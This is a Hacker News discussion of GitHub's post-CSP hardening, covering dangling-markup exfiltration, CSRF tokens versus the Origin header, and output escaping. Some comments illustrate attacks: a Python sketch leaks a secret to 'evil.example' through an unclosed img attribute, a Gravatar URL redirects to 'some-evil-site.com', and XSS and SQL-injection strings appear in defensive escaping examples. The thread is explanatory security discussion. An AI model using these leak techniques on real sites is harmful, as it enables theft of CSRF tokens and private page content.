
GitHub's post-CSP journey - eriknstr
https://githubengineering.com/githubs-post-csp-journey/
======
jaredsohn
The article says CSP seven times in the first two paragraphs without saying
what it stands for; it would be much more readable if it did. (It stands for
Content Security Policy, for those wondering.)

~~~
dfc
At a certain point you need to set a baseline expectation of your audience in
order to communicate effectively. Do you think they should also explain
exploitation, img-src, the mechanics of parsing unmatched quotes, javascript
or CSRF? The target audience of the article knows what CSP stands for and most
likely has been reading the other entries along this journey.

~~~
peteretep
You are getting downvoted because, in complaining that we are below your
technical baseline, you've ironically revealed that you're not familiar with
the rather more interesting CSP.

~~~
skj
As one of the more prominent gophers out there, dfc is quite familiar with
communicating sequential processes.

That said, I disagree with his original point. I am a regular HN reader and
did not know about content security policy.

~~~
LamaOfRuin
I did already know about content security policy. I still wasn't certain
that's what the article was referring to without reading several paragraphs of
the two articles.

------
niftich
A very detailed post describing their collaboration with the security
consulting firm Cure53 to identify various fairly novel exfiltration
techniques, and their attempts to adjust their Content-Security-Policy, or
some aspect of their application, to mitigate each one. This could be a great
resource, and is certainly a valuable 'lessons learned'.

But I was also overwhelmed. There's a quip that security is a losing battle,
but that wasn't my takeaway -- rather, the knowledge required to develop and
host a web application that accepts user-generated content without leaking
information seemingly everywhere is becoming too much for generalist
developers working alone or in small teams.

~~~
chias
They're interesting and often-overlooked techniques, but they are not novel.
You can read more about these sorts of attacks, and other similar ones, in the
2011 writeup "Postcards from the post-XSS world"[0]

[0] [http://lcamtuf.coredump.cx/postxss/](http://lcamtuf.coredump.cx/postxss/)

~~~
ptoomey3
Indeed, lcamtuf's article was a reference during this effort and was linked to
in our CSP post last year: [https://githubengineering.com/githubs-csp-journey/](https://githubengineering.com/githubs-csp-journey/)

------
jerf
Tone: I assume GitHub knows what they are doing, and I ask this question
because I have a hole in my understanding that I have a professional interest
in making sure is filled, not because I'm trying to "gotcha!" anybody or be
critical. This article clearly demonstrates they are trying hard and not
ignorant.

I don't understand why so much of this article talks about dangling markup.
While I highly recommend using the highest quality library you can get
your hands on for this task, cleaning up user-supplied markup to at least be
valid HTML is generally not that difficult. Cleaning up every last vector
within that valid HTML is much harder and much more subtle; I have fought that
fight myself, so I understand the bits about how awful the <plaintext> tag can
be and so forth (and how many other vectors there are for javascript, and
how many vectors there are for loading content you didn't want loaded, and how
many vectors there are for subtle leaks of information, etc., even within
syntactically-valid HTML). But making syntactically-invalid HTML into
syntactically-valid HTML that is at least not "dangling" is not that hard, and
can be done reliably.
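The "balance the tags" step really is mechanical. A toy sketch in Python using the stdlib `html.parser` (illustrative only; a real sanitizer must also filter tags and attributes, which this deliberately does not do):

```python
from html.parser import HTMLParser

class Balancer(HTMLParser):
    """Re-emit a fragment with every opened element explicitly closed."""
    VOID = {"img", "br", "hr", "input", "meta", "link"}  # elements with no close tag

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.stack = []

    def handle_starttag(self, tag, attrs):
        rendered = "".join(' {}="{}"'.format(k, v) for k, v in attrs if v is not None)
        self.out.append("<{}{}>".format(tag, rendered))
        if tag not in self.VOID:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in self.stack:
            # Close intermediate unclosed elements, then the tag itself.
            while self.stack:
                top = self.stack.pop()
                self.out.append("</{}>".format(top))
                if top == tag:
                    break
        # A stray close tag with no matching open is dropped entirely.

    def handle_data(self, data):
        self.out.append(data)

    def result(self):
        # Close anything still dangling at end of input.
        while self.stack:
            self.out.append("</{}>".format(self.stack.pop()))
        return "".join(self.out)

b = Balancer()
b.feed("<div><b>unclosed")
b.close()
print(b.result())  # <div><b>unclosed</b></div>
```

This only shows that producing syntactically balanced output is easy; the hard part, as noted, is deciding which of the now-valid tags and attributes are safe to keep.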

So I assume I'm missing some sort of context here about why they are having so
much trouble with this? What's the context where they can't run this sort of
syntax cleaner over the user input?

~~~
ptoomey3
Yeah, the missing context is that we are talking about vectors where GitHub
would not be sanitizing the input correctly. In other words, vectors that
traditionally resulted in XSS. We do exactly as you say in places where we
expect user controlled input. For example, all issue/pull request comments are
Markdown. And, for security, we go to great lengths to ensure that we only
accept a subset of HTML that is safe AND that the resulting HTML is well
formed.

But, as history has shown, XSS is more or less unavoidable. There are just too
many places where it can occur for any application to 100% avoid it. This is
at the heart of CSP: given that history has shown XSS was unavoidable, the
idea was to add a browser feature as a second line of defense.

So, the article is written from the perspective that traditional XSS is
neutered (the whole "scripting" bit of XSS is gone) using CSP. Given that,
what might an attacker be able to do without injecting any JavaScript? This is
the origin of "scriptless attacks", and dangling markup is the most popular
technique for exploiting one. So, it isn't that GitHub would be failing to
create well formed HTML. It would be a scenario where an attacker would
traditionally like to have injected a `<script>` tag, but is no longer able,
so they must go to the next best thing...dangling markup.
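A minimal illustration of the dangling markup idea (all URLs and page content here are hypothetical): the injected tag's unterminated quoted attribute swallows whatever markup follows it, up to the next matching quote, and ships it to the attacker as part of the image request URL.

```python
# Hypothetical injected fragment: an <img> whose src attribute is never closed.
injected = "<img src='https://evil.example/collect?"

# The page content that happens to follow the injection point.
page_after_injection = injected + "\n<p>secret: SECRET-TOKEN</p><a href='/next'>"

# A browser keeps consuming characters as part of the attribute value until
# it finds the matching quote -- here, the one opening the href attribute.
start = page_after_injection.index("src='") + len("src='")
end = page_after_injection.index("'", start)
leaked_url = page_after_injection[start:end]

print(leaked_url)
# Everything between the injection and the next quote -- including the
# secret -- becomes part of the URL requested from evil.example.
```

No JavaScript runs at any point, which is why script-blocking CSP directives alone don't stop it; only restricting where images may be loaded from does.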

~~~
tinus_hn
XSS is only unavoidable if you think the solution is sanitizing user input.

The solution to SQL injection is parametrized query construction, instead of
automatically filtering the ' character and then pasting the template and the
user input together.

Similarly, to avoid cross-site scripting you have to escape user input
properly as you combine it with your templates, instead of just concatenating
them and then hoping you can avoid the issues through input 'sanitizing'.
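Both points sketched in Python (the table name and values are illustrative): bound parameters for SQL, and escaping at the template boundary for HTML.

```python
import html
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")

user_input = "Robert'); DROP TABLE users;--"
# Parametrized query: the driver treats user_input as data, never as SQL.
conn.execute("INSERT INTO users (name) VALUES (?)", (user_input,))

comment = '<script>alert(1)</script>'
# Escape where text meets markup: the template stays markup, the input stays text.
safe_fragment = "<p>{}</p>".format(html.escape(comment))
print(safe_fragment)  # <p>&lt;script&gt;alert(1)&lt;/script&gt;</p>
```

In both cases the fix is structural, applied at the combination point, rather than a blocklist of dangerous characters applied to the input.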

------
tannhaeuser
Awesome article and thumbs up to github.

I have great reservations about CSP, however. I think it breaks the web in a
way that wouldn't have been necessary had we been a little more careful about
HTML syntax, rather than dismissing markup validation as an obsolete technique
back when the vulgar "HTML 5 rocks" campaigns were in full swing.

CSP spec drafts have been around forever but were never finalized. CSP
basically blocks execution of JavaScript in script tags in content (as opposed
to script in the header), as well as in event handler attributes (onclick and
co.), by disabling those altogether on a page. This totally breaks page
composability, where you assemble content at the markup stream level from
multiple sources, like, say, on every single news aggregation site. The
removal of scoped CSS styles from HTML similarly breaks composition.

From Chrome's Content Security Policy page[1]:

[Blocking inline script] does, however, require you to write your code with a
clean separation between content and behavior (which you should of course do
anyway, right?)

I think this comment is totally clueless wrt. what the Web is about.
"Separation of concerns" is most certainly _not_ a characteristic of the Web,
and never has been.

I'm sorry, but rather than using kludges such as CSP to turn the lights off
with a broad brush, how about fixing HTML and JavaScript in the first place?

(note my comment isn't addressed at github but at web standards committees)

[1]:
[https://developer.chrome.com/extensions/contentSecurityPolicy](https://developer.chrome.com/extensions/contentSecurityPolicy)

~~~
jerf
"I'm sorry, but rather than using kludges such as CSP to turning the lights
off with a broad brush, how about fixing HTML and JavaScript in the first
place?"

OK... how?

To be clear, I'm asking for an HN-comment level of detail, not a standards-
body level of detail. I can't speak for everyone else on HN, but I won't go
over things with a fine-tooth comb; I'll only look at top-level issues.

But I will at least point out that being able to casually float third-party
content into any site that has a weakness to XSS or man-in-the-middle or
vulnerabilities in any _other_ third-party content in the website is pretty
fundamental. The fundamental composition power of the web is too powerful and
it is going to have to be cut back. Some of the obvious solutions like
"whitelisting hashes of valid content" have their own problems, like how a lot
of the scripts being included out there are deliberately not constant and
that's their whole point in the first place.

~~~
tannhaeuser
1. Defining and using safe JavaScript subsets (in the style of Google's Caja
[3] and AdSafe [4], though probably that ship has sailed and cramming syntax
sugar into JS is the order of the day instead)

2. Defining and using safe CSS subsets (with countermeasures against
clickjacking/-phishing, hiding "nose prints", etc.), though granted this is
challenging; I had hoped a formal semantics for CSS would come along (such as
in [2]) but it didn't

3. Using HTML-aware template engines (such as [1], though there are maybe
lighter approaches with hard-coded HTML rules as well; disclaimer: [1] is my
project)

[1]:
[http://sgmljs.net/blog/blog1701.html](http://sgmljs.net/blog/blog1701.html)

[2]:
[https://lmeyerov.github.io/projects/pbrowser/pubfiles/extended.pdf](https://lmeyerov.github.io/projects/pbrowser/pubfiles/extended.pdf)

[3]:
[https://developers.google.com/caja/](https://developers.google.com/caja/)

[4]: [http://www.adsafe.org/](http://www.adsafe.org/)

------
whatnotests
Note: "CSP" = Content-Security-Policy as defined here:
[https://en.wikipedia.org/wiki/Content_Security_Policy](https://en.wikipedia.org/wiki/Content_Security_Policy)

------
steffenweber
If all browsers sent the "Origin" HTTP header [1] with POST requests (such
that web applications could rely on it), then the CSRF [2] tokens mentioned in
the article would become obsolete. You'd just have to check whether the
"Origin" header sent by the browser is identical to your scheme + domain name
(e.g. [https://www.example.com](https://www.example.com)) and be done. Chrome
and Safari implemented the "Origin" header long ago, but unfortunately Firefox
[3] and Edge [4] have not yet done so.

The "Origin" header is similar to the "Referer" header but never contains the
path or query. Furthermore, CSRF protection requires it only for "POST"
requests (i.e. "GET" requests are unaffected), so there is little reason to
offer an option to disable it for privacy concerns.
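The check described above is a one-liner per request. A hedged sketch (ALLOWED_ORIGIN is an assumed configuration value, and the `headers` dict stands in for a real request object):

```python
ALLOWED_ORIGIN = "https://www.example.com"  # this site's scheme + host

def is_same_origin_post(method: str, headers: dict) -> bool:
    """Accept POSTs only when the browser-supplied Origin matches our own."""
    if method != "POST":
        return True  # GET requests are unaffected by this scheme
    origin = headers.get("Origin")
    if origin is None:
        # Browser didn't send the header (e.g. Firefox/Edge at the time of
        # this thread) -- fall back to CSRF tokens, or reject outright.
        return False
    return origin == ALLOWED_ORIGIN

print(is_same_origin_post("POST", {"Origin": "https://www.example.com"}))  # True
print(is_same_origin_post("POST", {"Origin": "https://attacker.example"}))  # False
```

The fallback branch is exactly why the tokens can't be dropped yet: as long as some browsers omit the header, a missing Origin is indistinguishable from a legitimate request from those browsers.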

[1] [https://tools.ietf.org/html/rfc6454](https://tools.ietf.org/html/rfc6454)

[2] [https://en.wikipedia.org/wiki/Cross-site_request_forgery](https://en.wikipedia.org/wiki/Cross-site_request_forgery)

[3]
[https://bugzilla.mozilla.org/show_bug.cgi?id=446344](https://bugzilla.mozilla.org/show_bug.cgi?id=446344)

[4] [https://developer.microsoft.com/en-us/microsoft-edge/platform/issues/10482384/](https://developer.microsoft.com/en-us/microsoft-edge/platform/issues/10482384/) (filed by me)

~~~
ricardobeat
The Origin header is not as good for preventing CSRF, since it's a known
value. A CSRF token is a one-time value generated on the server; it's
impossible to guess or to obtain a valid one from the outside.

~~~
steffenweber
CSRF protection is not about attacks from evil clients (you can easily spoof
any header with the HTTP client library of your choice, of course). CSRF
protection is about preventing innocent / well-behaving clients from being
tricked into POSTing some data on behalf of their (logged-in) user.

~~~
ricardobeat
Yes. Forwarding a unique CSRF token from the backend gives you some assurance
that it's a legitimate request, initiated from a pageview within a timeframe.
A header (Origin) which always has the same value (the hostname) is inherently
less secure, though I overstated how much in the previous comment.
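A minimal sketch of the token scheme (a dict stands in for the server-side session store; names are illustrative, not any particular framework's API):

```python
import hmac
import secrets

def issue_token(session: dict) -> str:
    """Generate a fresh random token and remember it server-side."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token  # rendered into a hidden form field on the page

def check_token(session: dict, submitted: str) -> bool:
    """Compare the submitted value against the stored one in constant time."""
    expected = session.get("csrf_token", "")
    return hmac.compare_digest(expected, submitted)

session = {}
token = issue_token(session)
print(check_token(session, token))    # True: came from our rendered page
print(check_token(session, "guess"))  # False: an attacker can't predict it
```

The exfiltration attacks in the article matter precisely because this scheme's security rests on the token staying secret: if dangling markup can leak the hidden form field, the unpredictability no longer helps.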

------
joshschreuder
Can someone explain more about how the Gravatar example would work? How would
the attacker embed a dangling markup on Github.com? If they could do that,
couldn't they just use a standard XSS attack by embedding arbitrary HTML?

~~~
pixdamix
CSP mitigates the risks of XSS attacks.

If you look at
[https://cspvalidator.org/#url=https://github.com](https://cspvalidator.org/#url=https://github.com)
you'll see that the img-src directive of the CSP policy defines the origins
from which images can be loaded:

    'self' data: assets-cdn.github.com identicons.github.com collector.githubapp.com github-cloud.s3.amazonaws.com *.githubusercontent.com ;

Previously, images could have been loaded from additional domains (gravatar)
and could have been used to leak CSRF tokens.

~~~
laurent123456
What I don't understand is how the image URL ends up in a non-closed img src
attribute. They might be getting the URL from a third party:

      https://www.gravatar.com/avatar/0?d=https%3A%2F%2Fsome-evil-site.com%2Fimages%2Favatar.jpg%2f

But GitHub is the one opening and closing the tag, probably in some kind of
template:

      <img src="{gravatar_url}">
      <p>secret</p>

Which should result in this:

      <img src="https://www.gravatar.com/avatar/0?d=https%3A%2F%2Fsome-evil-site.com%2Fimages%2Favatar.jpg%2f">
      <p>secret</p>

and not this:

      <img src="https://www.gravatar.com/avatar/0?d=https%3A%2F%2Fsome-evil-site.com%2Fimages%2Favatar.jpg%2f
      <p>secret</p>

Any idea why they are getting the latter?

~~~
ptoomey3
Yes, the attack assumes a content injection bug in GitHub.com. The attack is
not using our own gravatar URL generation against us; it is the attacker
crafting an arbitrary URL and using that URL inside of an arbitrary image tag.
The reason for the attacker being "forced" to use a gravatar URL is that it
was one of the very few third-party hosts we previously allowed by our CSP
policy. So, the attack demonstrates how this previously allowed host could be
used to exfiltrate sensitive content if/when an attacker found a way to inject
arbitrary HTML into a page on GitHub.com.

------
mwexler
While I'm not a security expert, seeing the various ways someone can steal
info from a site even after all the protections GitHub put into place was
fascinating. It does bring back the old concern: if a site as large and
respected as GitHub has to do all this work and still encounters exploits,
what can an average person do who might run ad scripts, a tracking script, and
a few helper scripts from various sites? And how can tools put more
protections in place for average folks (cough, wordpress)?

If you liked this, btw, it's worth reading some content from their pentesters,
[https://cure53.de/](https://cure53.de/), whose site also has some interesting
findings and links.

------
technion
CSP is more of a landmine than we give it credit for. It tripped up Troy Hunt:

[https://www.troyhunt.com/how-chromes-buggy-content-security-policy-implementation-cost-me-money/](https://www.troyhunt.com/how-chromes-buggy-content-security-policy-implementation-cost-me-money/)

I had a very similar experience, and I'm still hunting for the specifics of
the browser that caused it in my case.

